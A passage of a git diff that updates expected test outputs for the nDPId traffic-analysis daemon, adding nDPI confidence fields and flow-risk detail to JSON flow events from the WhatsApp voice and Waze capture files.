-00599{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00715{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00616{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":3959,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","total-events-serialized":165}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 736/734
@@ -171,9 +171,9 @@
 ~~ total active/idle flows...: 28/28
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4738435 bytes
-~~ total memory freed........: 4738435 bytes
-~~ total allocations/frees...: 100391/100391
+~~ total memory allocated....: 4814532 bytes
+~~ total memory freed........: 4814532 bytes
+~~ total allocations/frees...: 101981/101981
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
 ~~ json string max len.......: 2418 chars
diff --git a/test/results/waze.pcap.out b/test/results/waze.pcap.out
index 2d468a878..cc77ba963 100644
--- a/test/results/waze.pcap.out
+++ b/test/results/waze.pcap.out
@@ -4,13 +4,13 @@
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
